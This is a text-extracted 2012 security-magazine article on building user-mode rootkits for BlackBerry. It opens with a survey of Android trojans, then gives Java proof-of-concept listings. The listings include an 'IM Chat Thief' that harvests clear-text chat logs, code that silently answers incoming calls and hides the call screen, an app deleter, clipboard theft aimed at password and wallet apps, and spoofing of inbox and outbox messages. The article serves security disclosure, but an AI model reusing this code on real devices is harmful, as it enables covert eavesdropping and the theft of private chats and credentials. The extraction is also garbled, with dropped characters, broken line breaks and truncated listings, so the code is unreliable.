When developers api simplify user mode rootkits development – part ii

56 04/2012
Mobile
Security
I
n a previous article, several cases were mentioned
along with ideas on how a mobile rootkit could easily
be built on the application level by exploiting API and
privilege escalation vulnerabilities or oversight. Cases
covered the top trojans for two years with the first one
being Android Plankton. Instead of giving access to hid-
den levels of this popular game, malware sends infor-
mation about the device to criminals and downloads
other malicious programs.
From the Android Market alone, the infected pro-
gram was downloaded more than 150,000 times and
from alternative resources the number of downloads
reached 250,000. Android.Plankton does not exploit
known vulnerabilities in operating systems to elevate
its own privileges. Instead, it downloads its own ser-
vice in the background immediately after the launch
of the infected application and begins to collect in-
formation about the device and sends it to a remote
server.
Another example was the Android malware Droid-
KungFu. This malware is capable of rooting the vulner-
able Android phones and may successfully evade de-
tection by the current mobile anti-virus software. This
malware is identified from four Android apps that have
been circulated among at least eight alternative Chi-
nese app markets and forums. The malware will add a
new service and receiver into the infected app. The re-
ceiver will be notified when the system finishes booting
so that it can automatically launch the service without
user interaction.
Geinimi Trojan includes capacities to gain for:
• Reading and collecting SMS messages
• Sending and deleting selected SMS messages
• Pulling all contact information and sending it to a
remote server (number, name, the time they were
last contacted)
• Placing a phone call
• Silently downloading files
• Launching a web browser with a specific URL
Geinimi has three different methods of starting it-
self. The trojan will first launch itself as its own ser-
vice. The service allows the trojan to start while the
host application appears to functioning normally. Two
other ways Geinimi starts revolves around Broad-
castReceivers Android events occurring. The trojan
will wake itself up from an SMS message. The Gein-
imi trojan has encrypted the embedded data, pay-
load and all communications – however, encryption
is weak. The values in the request for commands
can be used by the command and control server to
identify information about infected devices. The lon-
gitude and latitude can then be used to track the lo-
cation of this specific user. Also, the trojan gathers a
list of applications and their activities on the device,
sends an SMS to any recipient, deletes SMSs, lists
SMSs to specific contacts, lists contacts and their
information, calls any number, silently downloads
files and launches a web browser with a specific
URL.
An SMS trojan called Trojan-SMS.AndroidOS.Fake-
Player, once installed, actually sends out SMS mes-
sages without the user’s knowledge or consent. Us-
ers are prompted to install a small file of around 13KB
(have you ever seen such a small media player?). The
trojan bundled with it then begins texting premium rate
phone numbers. The criminals are actually the ones
This series of articles is about the ease of which user-mode rootkits for
BlackBerry can be developed.
When developers API
simplify user-mode rootkits development

www.hakin9.org/en 57
Listing 1. API-routines to design malware “MEDIA PLAYER IO (Input/Output)”
import java.io.DataInputStream;
import java.io.IOException;
import java.io.OutputStream;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import net.rim.device.api.io.IOUtilities;
Listing 2a. Code Example how read and write files [malware “MEDIA PLAYER IO (Input/Output)”]
public static byte[] readFile(String FullName)
///FullName includes FullPath to file with file name and file extension
{
byte[] data = null; //array of data you want to return (read)
FileConnection fconn = null;
DataInputStream is = null;
try
{
fconn = (FileConnection) Connector.open(FullName, Connector.READ);
s = fconn.openDataInputStream();
data = IOUtilities.streamToBytes(is);
}
catch (IOException e) { }
finally
{
try
{
f (null != is)
{
s.close();
}
if (null != fconn)
{
fconn.close();
}
}
catch (IOException e) { }
}
return data;
}
public static void writeFile(String FullName, byte[] data)
///FullName includes FullPath to file with file name and file extension
// data is array you want to put into file
{
OutputStream os = null;
try
{
fconn = (FileConnection) Connector.open(FullName, Connector.READ_WRITE);
if (!fconn.exists())
// create file if one doesn’t exist
{

58 04/2012
Mobile
Security
online banking session open and live even after us-
ers think they have logged out of their account. This
allows criminals to extract money and continue other
fraudulent activity even after the user thinks the ses-
sion has ended.
BlackBerry Opportunity
Is it really difficult to bring the vulnerabilities to the Black-
Berry devices? We are going to see how it is really easy
to port these techniques to BlackBerry devices.
The first two ideas and proof-of-concepts are about
the BlackBerry file-system. As you may know, Black-
Berry can encipher the whole file system as well as re-
moved files. Talking about a ciphered file-system, you
should understand that this feature makes sense only
when all storage cards and memory are removed from
devices to extract information, similar to forensic cases.
Instead, when you rely on live spying you will get much
more information rather trying to decipher it or get the
password.
First malware concept, the so called media player,
based not so much on human bugs as it is on GUI
bugs. Unfortunately, humans are not the last point of
operating these numbers, so they end up collecting the
money via charges to the victims’ accounts.
The trojan spyware application known as Zitmo, is de-
signed to steal people’s financial data by listening to all in-
coming SMS messages and forwarding them to a remote
web server. That is a security risk, as some banks now
send mTANs via SMS as a one-time password for authen-
tication. By intercepting these passwords, it can not only
create fraudulent money transfers, but also verify them.
The trojan program “OddJob” does not require fraud-
sters to log into a user’s online bank account to steal
from it. Instead, the malware is designed to hijack a
user’s online banking session in real-time by stealing
session ID tokens. By stealing the tokens and embed-
ding them into their own browsers, fraudsters can im-
personate a legitimate user and access accounts while
the user is still active online. The access allows fraud-
sters to then conduct whatever banking operations the
account holder can perform. This approach is differ-
ent than typical man-in-the browser attacks where at-
tackers use trojans to steal login credentials that are
then used to break into online accounts. The second
interesting feature in OddJob is its ability to keep an
Listing 2a. Code Example how read and write files [malware “MEDIA PLAYER IO (Input/Output)”]
fconn.create();
}
os = fconn.openOutputStream(fconn.fileSize());
os.write(data);
}
catch (Exception e) { Dialog.alert(e.getMessage());
finally
{
try
{
os.close();
fconn.close();
}
catch (IOException e) { Dialog.alert(e.getMessage()); }
}
}
Listing 3. File’n’Folder TreeWalk (breifly)
Vector Path = new Vector();
Path.addElement((String) “file:///SDCard/BlackBerry/im”);
Path.addElement((String) “...” - repeat several times
Enumeration Path_enum = Path.elements();
while (Path_enum.hasMoreElements())
{
current_path = (String) Path_enum.nextElement();
to do something
}

defense when we talk about vulnerabilities, trojans,
etc. Our behaviour is based on traditions of the past
sometimes, as well as tools which used to change with
age. In the past, access to files used to be strictly via
DOS/Unix system; nowadays we have an aggregation
of folders like Music, Photos, Photo-Camera’s folder,
or Videos. The GUI was developed as a result of the
desire for a convenient way to access files. Taking the
discussion to file access on our smart phones, audio
notes, photos, videos, music, and camera’s data are
stored in one place (more correctly in two places, on
internal storage and external storage like SD-card)
and applications are allowed to access these folder
paths to extract data in real-time; moreover API ac-
cess to those same folders are easily obtained. Also,
they may associate their listeners with a specific file
format like .AMR which used to store your BlackBerry
audio notes. They are often stored in the “voicenotes”
folder, named as VN-20120319-xxxx.AMR. As you can
see, you do not need to extract its properties to know
when it was recorded; you do not even need to link
(programmatically) the folder with type of file (logical
level) because “VN” is a voice note. Video files are re-
corded by the device and named “VID-YYYYMMDD-
XXXXXX.3GP” as voice note or picture file. Photos are
named as IMG20120103-xxxx. To talk about a geo-tag
per file, a “Moskva” prefix in added to file name. It is
obvious why developers store the name of the file as
the city part, date part and increment part. Continuous
numbering is allowed in these cases, but why isn’t it
developed with the increment part then the hash part
at the end of file name (XXXX-hash-dot-extension)?
Several file-systems differ in the way files should be
sorted, but developers are still able to ask device own-
ers what they prefer. Doing this makes things sim-
ple, easier to control and a bit more secure, don’t you
agree? Of course, our media player as malware must
have a network connection to get updates despite the
fact that each BlackBerry device receives update noti-
fications from AppWorld and OS updates should be re-
ceived via USB-cable by synchronizing with the Black-
Berry Desktop Software. Instead, our application may
grab news from an official site, update news, offers to
share music status and steal and send cached infor-
mation (Listing 1-Listing 3).
Second malware concept covers BlackBerry chats. If
you turn on the option to save chat on internal storage
(device) or on external storage (SD-Card) you will be
notified about how you should ask interlocutor to agree
with recording your chat history. By the way, it doesn’t
File Paths should be monitored
/Device/Home/User/ – if information stored on internal memory
/MediaCard/BlackBerry/ – if information stored on external memory
../IM/AIM/USERNAME/history/ – AIMs history in csv format
../IM/BlackBerryMessenger/PIN/history/ – BBMs history in csv format
../IM/GoogleTalk/USERNAME/history/ – GTalks history in csv format
../IM/Yahoo/USERNAME/history/ – YMessengers history in csv format
../IM/WindowsLive/USERNAME/history/ – WLives history in csv format
../pictures – Manully added pic or screenshoted data
../camera – Photo captured data
../videos – Video captured data
../voice notes – Voice captured data
Figure 1. Logged BlackBerry Conversation Figure 2. Window of BlackBerry Conversation

60 04/2012
Mobile
Security
Figure 3. Logged Google Conversation Figure 5. Logged WinLive Conversation
Figure 4. Window of Google Conversation Figure 6. Window of WinLive Conversation
Chat Details
All IM chats (from application developed by RIM) files marked
to be saved are often located on the same file paths
INTERNAL STORAGE: file:///store/home/user/im
EXTERNAL STORAGE: file:///SDCard/BlackBerry/im
Then stores IM folder per each native IM client
IM Folders
• AIM
• BlackBerry Messenger
• Google Talk
• Windows Live
• Yahoo
Then stores folder named as your account such as
• AIM Account: yury.chemerkin@aim.com
• Google Account: yury.chemerkin@gmail.com
• Windows Live Account: yury.chemerkin@hotmail.com
• Yahoo Account: yury.chemerkin
• BlackBerry Account: 23436780 (BlackBerry PIN)
Then stores a “history” folder which contatins .CSV files named
by account name of interlocutor like yury.chemerkin@gmail.
com. Also, conference/group chats folder are placed here:
• AIM: Conferences
• Google: Conferences
• Windows Live: Conferences
• Yahoo: Conferences
• BlackBerry: Group Chats
BlackBerry chat csv file format
Date/Time PIN Sender PIN Receiver Data
YYYYMMDDHHMMSSMS HEX VALUE HEX VALUE STRING
Non-BlackBerry chat csv file format
Date/Time ID Sender ID Receiver Data
YYYYMMDDHHMMSSMS STRING STRING STRING

work for each, instead, it is a global feature; that’s why
there’s no sense as you see. By default this feature is
turned off. However, if you turn on saving you will be sur-
prised by the fact that your data is stored in clear-text.
Don’t think that only Google, Yahoo, or another non-
BlackBerry doesn’t encipher them; BlackBerry chats are
still not encrypted. Also, Shape IM+ for Linux relies on
the root folder only without encryption. Note, that Yahoo
Messenger, AIM (AOL) Messenger, Windows Live Mes-
senger, Google Messenger and BlackBerry Messenger
are developed by RIM. However, there’s a native secu-
rity solution: no .CSV format by the device except for
special programs. Just copy this file to a PC and open it
with Notepad. To see formatted chats, you should open
it with Excel or OpenOffice.
Summary
• File-system ciphering isn’t developed for live spying
• Chats stored in clear-text
• You can’t read them with device
• The same way to store chats
• You need to turn on saving option feature
• Notepad or Excel to see them (Figure 1-Figure 10,
Listing 4)
Third malware concept is based on several APIs act-
ing in stealth mode. At first, you have to catch incom-
ing call events, secondly, you have to simulate an an-
swer event by simulating pressing of the answer but-
ton and then you should hide the caller screen to get
back the home screen by simulating/pressing the es-
cape button. Answer simulating refers to the Keypad.
KEY _ SEND; to release pressing you have to press and
release button by simulating KeyCodeEvent.KEY _ DOWN
and KeyCodeEvent.KEY _ UP. Before you do this, you
should understand that at least 1 second should pass
when you get an incoming event to draw a native call-
er to the screen you managed. Then (when accept-
ing an incoming call) you should hide via Keypad.
KEY _ ESCAPE, however if you press the escape button
you will be asked whether or not to go to the home
Figure 7. Logged Yahoo Conversation Figure 9. Logged AIM (AOL) Conversation
Figure 8. Window of Conversation Figure 10. Window of AIM (AOL) Conversation

62 04/2012
Mobile
Security
Listing 4a. IM Chat Thief
package blackberryChatThief;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Enumeration;
import java.util.Vector;
import net.rim.device.api.io.file.ExtendedFileConnection;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.component.Dialog;
import net.rim.device.api.ui.container.MainScreen;
public class BlackBerryChatThiefScreen extends MainScreen implements FieldChangeListener
public BlackBerryChatThiefScreen()
{
setTitle(“BlackBerry Chat Thief Application”);
checkButton = new ButtonField(ButtonField.CONSUME_CLICK | ButtonField.FIELD_HCENTER);
checkButton.setLabel(“Steal your own chat :)”);
checkButton.setChangeListener(this);
add(checkButton);
exitButton = new ButtonField(ButtonField.CONSUME_CLICK | ButtonField.FIELD_HCENTER);
exitButton.setLabel(“Exit”);
exitButton.setChangeListener(this);
add(exitButton);
}
public void fieldChanged(Field field, int param)
{
if (field == checkButton)
{
String string_result;
try
{
Vector Path = new Vector();
String current_path = new String();
String current_im = new String();
String current_id = new String();
String current_conv = new String();
String root_dir = new String();

Listing 4b. IM Chat Thief
Vector log = new Vector();
FileConnection root_sdcard = null;
FileConnection root_store = null;
try
{
root_sdcard = (FileConnection)Connector.open(“file:///SDCard/”);
}
catch (IOException ex)
{
log.addElement((String) “SDCard not found”);
}
try
{
root_store = (FileConnection)Connector.open(“file:///store/”);
}
catch (IOException ex)
{
log.addElement((String) “store not found”);
}
if ((root_sdcard != null) && root_sdcard.exists())
{
root_dir = “file:///SDCard/”;
Path.addElement((String) “file:///SDCard/BlackBerry/im”);
}
else if ((root_store != null) && root_store.exists())
{
root_dir = “file:///store/home/user/”;
Path.addElement((String) “file:///store/home/user/im”);
}
Enumeration Path_enum = Path.elements();
FileConnection copyf = (FileConnection)Connector.open(root_dir + “chat.txt”);
if (copyf.exists())
{
copyf.delete();
}
copyf.create();
OutputStream writer = copyf.openOutputStream();
FileConnection logger = (FileConnection)Connector.open(root_dir + “log.txt”);
if (logger.exists())
{
logger.delete();
}
logger.create();
OutputStream logwriter = logger.openOutputStream();
if (!Path_enum.hasMoreElements())
{
logwriter.write((“Directory [“ + Path + “] doesn’t have subdirsrn”).
getBytes());

64 04/2012
Mobile
Security
Listing 4c. IM Chat Thief
logwriter.flush();
}
else
while (Path_enum.hasMoreElements())
{
logwriter.write((“Directory [“ + Path + “] has subdirsrn”).getBytes());
logwriter.flush();
current_path = (String) Path_enum.nextElement();
FileConnection IM_dir = (FileConnection)Connector.open(current_path);
if (!IM_dir.exists())
{
logwriter.write((“Path [“ + IM_dir.getURL() + “] doesn’t found
rn”).getBytes());
logwriter.flush();
}
else
{
logwriter.write((“Path [“ + IM_dir.getURL() + “] foundsrn”).getBytes());
logwriter.flush();
Enumeration IM_list = IM_dir.list();
if (!IM_list.hasMoreElements())
{
logwriter.write((“Directory [“ + IM_dir.getURL() + “] doesn’t have
subdirsrn”).getBytes());
logwriter.flush();
}
else
while (IM_list.hasMoreElements())
{
logwriter.write((“Directory [“ + IM_dir.getURL() + “] has subdirs
rn”).getBytes());
logwriter.flush();
current_path = IM_dir.getURL() + (String) IM_list.nextElement();
FileConnection ID = (FileConnection)Connector.open(current_path);
if (!ID.exists())
{
logwriter.write((“Path [“ + ID.getURL() + “] doesn’t foundrn”).
getBytes());
logwriter.flush();
}
else
{
logwriter.write((“Path [“ + ID.getURL() + “] foundsrn”).
getBytes());
logwriter.flush();
current_im = “CURRENT IM TYPE :: “ + ID.getName().substring(0,
ID.getName().length() - 1) + “rn”;

Listing 4d. IM Chat Thief
//current_im = “rn--------IM SEPARATOR------rn” + current_im;
Enumeration ID_list = ID.list();
if (!ID_list.hasMoreElements())
{
logwriter.write((“Directory [“ + ID.getURL() + “] doesn’t have
subdirsrn”).getBytes());
logwriter.flush();
}
else
while (ID_list.hasMoreElements())
////if (ID_list.hasMoreElements())
{
logwriter.write((“Directory [“ + ID.getURL() + “] has subdirs
rn”).getBytes());
logwriter.flush();
current_path = ID.getURL() + (String) ID_list.nextElement() +
“history”;
FileConnection history_dir = (FileConnection)Connector.
open(current_path);
if (!history_dir.exists())
{
logwriter.write((“Directory [“ + history_dir.getURL() + “]
doesn’t existrn”).getBytes());
logwriter.flush();
}
else
{
current_id = current_path.substring(0, current_path.length()
- (“/history”).length());
current_id = current_id.substring(ID.getURL().length(),
current_id.length());// - ID.getURL().length());
//current_id = “rn--------ID SEPARATOR------rn” + current_id;
current_id = “CURRENT ID :: “ + current_id + “rn”;
Enumeration chats = history_dir.list();
if (!chats.hasMoreElements())
{
logwriter.write((“Directory [“ + history_dir.getURL() +
“] doesn’t have subdirsrn”).getBytes());
logwriter.flush();
}
else
{
logwriter.write((“Directory [“ + history_dir.getURL() +
“] has subdirsrn”).getBytes());
logwriter.flush();
while (chats.hasMoreElements())
{

66 04/2012
Mobile
Security
Listing 4e. IM Chat Thief
current_path = history_dir.getURL() + (String)
chats.nextElement();
ExtendedFileConnection chat_file =
(ExtendedFileConnection)Connector.open(current_path);
if (!chat_file.isDirectory() & !chat_file.getName().
endsWith(“rem”))
{
current_conv = chat_file.getName();
//current_conv = “rn--------CHAT SEPARATOR----
--rn” + current_conv;
current_conv = “CURRENT CHAT :: “ + current_conv + “rnCHAT :: rn”;
byte[] array = new byte[(int) chat_file.
fileSize()];
InputStream raw_reader = chat_file.
openInputStream();
array = IOUtilities.streamToBytes(raw_reader);
raw_reader.close();
logwriter.write((“CSV [“ + chat_file.getURL() +
“] has readrn”).getBytes());
logwriter.flush();
writer.write(current_im.getBytes());
writer.write(current_id.getBytes());
writer.write(current_conv.getBytes());
writer.write(array);
writer.write((“rn--------separator------
rn”).getBytes());
logwriter.write((“CSV [“ + chat_file.getURL() +
“] has writtenrn”).getBytes());
logwriter.flush();
}
}
}
}
}
}
}
}
}
logwriter.write((“DONErn”).getBytes());
logwriter.flush();
string_result = “DONE”;
writer.flush();
writer.close();
logwriter.flush();
logwriter.close();
copyf.close();

screen. Therefore malware has to simulate an agree-
ment via Keypad.KEY _ ENTER to successfully bypass the
user eyes. Where it is all at, no one has another API
to make your own caller screen and manage the in-
coming calls. To extend impacting to simulate phys-
ical input, you can read my 2nd article (Hakin9, Is
Data Secure On The Password Protected Blackber-
ry Device). However, it is easy to put a symbol in the
Listing 4f. IM Chat Thief
}
catch (Exception ex)
{
string_result = ex.toString() + “||” + ex.getMessage();
}
Dialog.alert(string_result);
}
else if (field == exitButton)
{
System.exit(0);
}
}
}
Figure 12. Incoming Call
Figure 11. Before Call Figure 13. Answering
Figure 14. Escaping to the Home Screen

68 04/2012
Mobile
Security
Listing 5a. Caller Malware
package blackBerryPhoneEmulation;
import net.rim.blackberry.api.phone.Phone;
import net.rim.blackberry.api.phone.PhoneCall;
import net.rim.blackberry.api.phone.PhoneListener;
import net.rim.device.api.system.EventInjector;
import net.rim.device.api.system.EventInjector.KeyCodeEvent;
import net.rim.device.api.ui.UiApplication;
public class BlackBerryPhoneEmulationApp extends UiApplication implements PhoneListener
{
int sleep_time = 1000;
public static void main(String[] args)
{
BlackBerryPhoneEmulationApp theApp = new BlackBerryPhoneEmulationApp();
theApp.enterEventDispatcher();
}
public BlackBerryPhoneEmulationApp()
{
pushScreen(new BlackBerryPhoneEmulationScreen());
Phone.addPhoneListener(this);
}
public void close()
{
Phone.removePhoneListener(this);
System.exit(0);
}
public void callIncoming(int callId)
{
final PhoneCall call = Phone.getCall(callId);
final String number = call.getDisplayPhoneNumber();
EventInjector.KeyCodeEvent pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_
DOWN, (char) Keypad.KEY_SEND, 0);
EventInjector.KeyCodeEvent releaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.
KEY_UP, (char) Keypad.KEY_SEND, 0);
try
{
Thread.sleep(sleep_time);
}
catch (InterruptedException e) {}
EventInjector.invokeEvent(pressKey);
EventInjector.invokeEvent(releaseKey);
}

Listing 5b. Caller Malware
public void callAdded(int callId) {}
public void callAnswered(int callId) {}
public void callConferenceCallEstablished(int callId) {}
public void callConnected(int callId)
{
EventInjector.KeyCodeEvent pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char)
Keypad.KEY_ESCAPE, 0);
EventInjector.KeyCodeEvent releaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char)
Keypad.KEY_ESCAPE, 0);
try
{
// Waiting a caller screen have been drawn
}
}
///Releasing Escaping to the Home Screen
pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char) Keypad.KEY_ENTER, 0);
eleaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char) Keypad.KEY_ENTER, 0);
try
{
//Waiting prompt screen have been drawn
}
///Accepting Escaping to the Home Screen
}
public void callDirectConnectConnected(int callId) {}
public void callDirectConnectDisconnected(int callId) {}
public void callDisconnected(int callId) {}
public void callEndedByUser(int callId) {}
public void callFailed(int callId, int reason) {}
public void callHeld(int callId) {}
public void callInitiated(int callid) {}
public void callRemoved(int callId) {}
public void callResumed(int callId) {}
public void callWaiting(int callid) {}
public void conferenceCallDisconnected(int callId) {}
}

70 04/2012
Mobile
Security
text field, while putting a string by one symbol and
track-wheel moving is too difficult although it may be
enough to input passwords (Figure 11-Figure 14, List-
ing 5).
Fourth malware concept is about destructive inter-
action. What is a common thesis when someone talks
about security? A security component must not be delet-
ed because it brings down a security wall. Why doesn’t
malware delete all applications and modules installed
on your device? Some applications consist of several
modules and one removed crash down after the first
successful reboot. Another attack vector, BlackBerry
Enterprise Server offers application controlling by re-
sending modules to selected devices regarding IT Pol-
icy. If a malware application turns off wireless to crash
the device then no one policy saves the device. When
you install an application you are asked to choose per-
missions that you grant to this application. As you know
from my articles about screenshot catching, the device
sometimes should ask what windows are allowed to in-
teract with screenshot and which aren’t allowed. This
case is the same and all you need to delete other appli-
cations is a name and permission to interact with Appli-
cation Manager. How do you extract data about applica-
tions? The easiest way to interrupt user flows is to grab
active applications at current time via ApplicationManager.
getApplicationManager().getVisibleApplications();. When
the application list has got malware grabs Localized-
Name and ModuleHandle to find them in Application
Manager lists and deletes by using: ModuleHandle. That’s
all (Figure 15-Figure 18, Listing 6).
Fifth malware concept manages with Clipboard. From
previous zsndroid malware cases I retell in the begin-
ning you learn password may extract from SMS or GET/
POST requests. My case refers to Password Keeper
and BlackBerry Wallet, which are both developed by
RIM; also, it is native and pre-installed by default. The
first application is designed to keep passwords more
than the second, which is designed to keep not only
passwords but also banking data. Extract essential in-
formation stored in BlackBerry backups. Elcomsoft
BlackBerry Backup Explorer allows forensic specialists
Figure 16. Details of Victim Apps
Figure 17. App List with deleted victim app
Figure 15. App list with Victim app Figure 18. Details of deleted victim app

Listing 6a. Code Example how find application among set of applications already running and how delete application
package blackBerryDeleterpackage;
import net.rim.device.api.system.ApplicationDescriptor;
import net.rim.device.api.system.ApplicationManager;
import net.rim.device.api.system.CodeModuleManager;
public final class BlackBerryDeleterScreen extends MainScreen implements FieldChangeListener
{
ButtonField bt_find = null;
ButtonField bt_delete = null;
TextField tf2 = null;
String stf2 = “”;
public BlackBerryDeleterScreen()
{
// Set the displayed title of the screen
setTitle(“BlackBerryDeleterTitle”);
bt_find = new ButtonField();
bt_delete = new ButtonField();
tf2 = new TextField();
bt_find.setLabel(“FIND APP”);
bt_delete.setLabel(“DEL APP”);
bt_find.setChangeListener(this);
bt_delete.setChangeListener(this);
tf2.setLabel(“INFOrn”);
add(tf2);
add(bt_find);
add(bt_delete);
}
public void fieldChanged(Field field, int context)
{
if (field == bt_find)
//BUTTON “FIND APPLICATION”
{
try
{
int curr_app = ApplicationDescriptor.currentApplicationDescriptor().getModuleHandle();
ApplicationDescriptor desc = null;
ApplicationDescriptor[] descs = null;
try
{
descs = ApplicationManager.getApplicationManager().
getVisibleApplications();

72 04/2012
Mobile
Security
Listing 6b. Code Example how find application among set of applications already running and how delete application
int handle = 0;
stf2 += “length = “ + descs.length + “rn”;
for (int i = 0; i < descs.length; i++)
{
stf2 += “|| “ + descs[i].getLocalizedName() + “ ||” + “rn”;
stf2 += “|| “ + descs[i].getModuleHandle() + “ ||” + “rn”;
if (descs[i].getModuleName().compareTo(“BlackBerryFILEIO”) == 0)
{
handle = descs[i].getModuleHandle();
stf2 += descs[i].getModuleName() + “rn”;
}
else if (descs[i].getLocalizedName().compareTo(“BlackBerry FILE IO”) == 0)
{
stf2 += descs[i].getLocalizedName() + “rn”;
}
}
try
{
if (handle > 0)
{
stf2 += “app found” + “rn”;
}
else
{
stf2 += “handle null” + “rn”;
}
}
catch (Exception e)
{
stf2 += e.getMessage() + “rn”;
}
}
catch (Exception e)
{
}
}
catch (Exception e)
{
stf2 += e.getMessage();
}
tf2.setText(stf2);
}
else if (field == bt_delete)
//BUTTON DELETE APPLICATION
{
try
{
int curr_app = ApplicationDescriptor.currentApplicationDescriptor().getModuleHandle();
ApplicationDescriptor desc = null;

Listing 6c. Code Example how find application among set of applications already running and how delete application
ApplicationDescriptor[] descs = null;
try
{
descs = ApplicationManager.getApplicationManager().getVisibleApplications();
int handle = 0;
stf2 += “length = “ + descs.length + “rn”;
for (int i = 0; i < descs.length; i++)
{
stf2 += “|| “ + descs[i].getLocalizedName() + “ ||” + “rn”;
stf2 += “|| “ + descs[i].getModuleHandle() + “ ||” + “rn”;
if (descs[i].getModuleName().compareTo(“BlackBerryFILEIO”) == 0)
{
stf2 += descs[i].getModuleName() + “rn”;
}
else if (descs[i].getLocalizedName().compareTo(“BlackBerry FILE IO”) == 0)
{
stf2 += descs[i].getLocalizedName() + “rn”;
}
}
try
{
if (handle > 0)
{
CodeModuleManager.deleteModuleEx(handle, true);
stf2 += “true delete” + “rn”;
}
else
{
stf2 += “handle null” + “rn”;
}
}
catch (Exception e)
{
}
}
catch (Exception e)
{
}
}
catch (Exception e)
{
stf2 += e.getMessage();
}
tf2.setText(stf2);
}
}
}

74 04/2012
Mobile
Security
investigating the content of BlackBerry devices by ex-
tracting, analyzing, printing or exporting the content of a
BlackBerry backup produced with BlackBerry Desktop
Software. But Elcomsoft manages to work with export-
ed data that you back up. RIM made a “good” security
solution to restrict any access attempts to the clipboard
while their applications are active. If you try to grab data
you’ll get the error message “Unauthorized attempt to
attach to this application.” Don’t panic, because when a
user minimizes it or closes it, a successful data extrac-
tion happens. If you want to know whether BlackBerry
Wallet (or Password Keeper) is running now, use the
code example on how to find application (Figure 19-Fig-
ure 20, Listing 7).
Screenshotting has been discussed many times,
therefore I highlight that “this feature” can easily by-
pass security flows when the user restricts other per-
missions. For example, if user restricts a GEO per-
mission you listen to active applications for catching
screen shot of a map that the user is seeing at current
time. When the map application starts it often shows
Figure 20. BB Wallet. Showing & Stealing
Figure 19. BB Wallet. Creating & Stealing
Listing 7. Clipboard exploitation (How extract data to steal
data, and how to put data to mislead someone)
import net.rim.device.api.ui.component.TextField;
import net.rim.device.api.system.Clipboard;
public final class BlackBerryClipboardScreen extends
MainScreen
{
public BlackBerryClipboardScreen()
{
setTitle(“BlackBerryClipboardTitle”);
Clipboard clipb = Clipboard.getClipboard();
TextField tf1 = new TextField();
add(tf1);
add(tf2);
add(tf3);
tf1.setLabel(“to_string : < “ + clipb.
toString() + “ >”);
// SHOW CLIPBOARD AS STRING OBJECT
String str = “”;
try
{
str = (String)clipb.get();
// GET CLIPBOARD DATA
}
catch (Exception e) { }
try
{
clipb.put(“PUT”);
// CLIPBOARD SET BY WORD “PUT”
}
tf2.setLabel(“getted : < “ + str + “ >”);
// SHOW THAT CLIPBOARD DATA HAS BEEN STOLEN
try
{
str = (String)clipb.get();
// GET NEW CLIPBOARD DATA
}
tf3.setLabel(“getted : < “ + str + “ >”);
// SHOW THAT CLIPBOARD SET BY WORD “PUT”
}
}

Listing 8a. MESSAGE MISLEADING
package blackBerryMessageMisleading;
import java.io.DataInputStream;
import java.util.Date;
import net.rim.blackberry.api.mail.Address;
import net.rim.blackberry.api.mail.AddressException;
import net.rim.blackberry.api.mail.Folder;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.mail.MessagingException;
import net.rim.blackberry.api.mail.Multipart;
import net.rim.blackberry.api.mail.
NoSuchServiceException;
import net.rim.blackberry.api.mail.PINAddress;
import net.rim.blackberry.api.mail.Session;
import net.rim.blackberry.api.mail.Store;
import net.rim.blackberry.api.mail.
SupportedAttachmentPart;
import net.rim.device.api.io.MIMETypeAssociations;
import net.rim.device.api.ui.component.Dialog;
import net.rim.device.api.ui.component.TextField;
public final class BlackBerryMessageMisleadingScreen
extends MainScreen implements
FieldChangeListener
{
private ButtonField checkiButton = null;
private ButtonField checkoButton = null;
private ButtonField checkpoButton = null;
private ButtonField checkpiButton = null;
private ButtonField checkiaButton = null;
TextField tf = null;
public BlackBerryMessageMisleadingScreen()
{
setTitle(“BlackBerry Message Misleading”);
TextField textfield = new TextField();
textfield.setLabel(“Mislead yourself via
BlackBerry Technology”);
add(textfield);
checkiButton = new ButtonField(ButtonField.
CONSUME_CLICK | ButtonField.FIELD_
HCENTER);
checkiButton.setLabel(“Inbox Misleading”);
checkiButton.setChangeListener(this);
add(checkiButton);
checkiaButton = new ButtonField(ButtonField.
HCENTER);
checkiaButton.setLabel(“Inbox Attach
Misleading”);
checkiaButton.setChangeListener(this);
add(checkiaButton);
checkoButton = new ButtonField(ButtonField.
HCENTER);
checkoButton.setLabel(“Outbox Misleading”);
checkoButton.setChangeListener(this);
add(checkoButton);
checkpoButton = new ButtonField(ButtonField.
HCENTER);
checkpoButton.setLabel(“OutBox PIN MISLEAD”);
checkpoButton.setChangeListener(this);
add(checkpoButton);
checkpiButton = new ButtonField(ButtonField.
HCENTER);
checkpiButton.setLabel(“InBox PIN MISLEAD”);
checkpiButton.setChangeListener(this);
add(checkpiButton);
tf = new TextField();
tf.setLabel(“enter fake pin”);
tf.setText(“”);
add(tf);
}
public void fieldChanged(Field field, int param)
{
if (field == checkoButton)
{
String res = “”;
boolean odelivered
= true;//false;
//MESSAGE WILL BE
DELIVERED
String omessage =
“^_^”;

76 04/2012
Mobile
Security
Listing 8b. MESSAGE MISLEADING
//MESSAGE BODY
Address oaddress =
null;
try
{
oaddress
= new Address(“fake@ololo.com”,
“trololo friend”);
//SET A
NEW RECIPIENT
}
catch
(AddressException e) { res +=
e.getMessage(); }
res +=
MisLeadSentMessage(oaddress,
omessage, odelivered);
//EMAIL MESSAGE
BUILDER
Dialog.alert(“Result for you :: “ + res);
}
else if (field == checkiButton)
{
String imessage =
“^_^”;
//MESSAGE BODY
Address iaddress =
null;
try
{
iaddress
//
SENDER ADDRESS
}
catch
e.getMessage(); }
res +=
MisLeadInboxMessage(iaddress,
imessage);
//EMAIL MESSAGE
BUILDER
Dialog.
alert(“Result for you :: “ + res);
}
else if (field == checkpoButton)
{
if (tf.getText().
length() > 0)
//GET RECIPIENT PIN
from fextfield
{
Dialog.
alert(MisLeadSentPIN(tf.
getText()));
//PIN
MESSAGE BUILDER
}
}
else if (field == checkpiButton)
{
if (tf.getText().
length() > 0)
//GET SENDER PIN
from textfield
{
Dialog.
alert(MisLeadInboxPIN(tf.
getText()));
//PIN
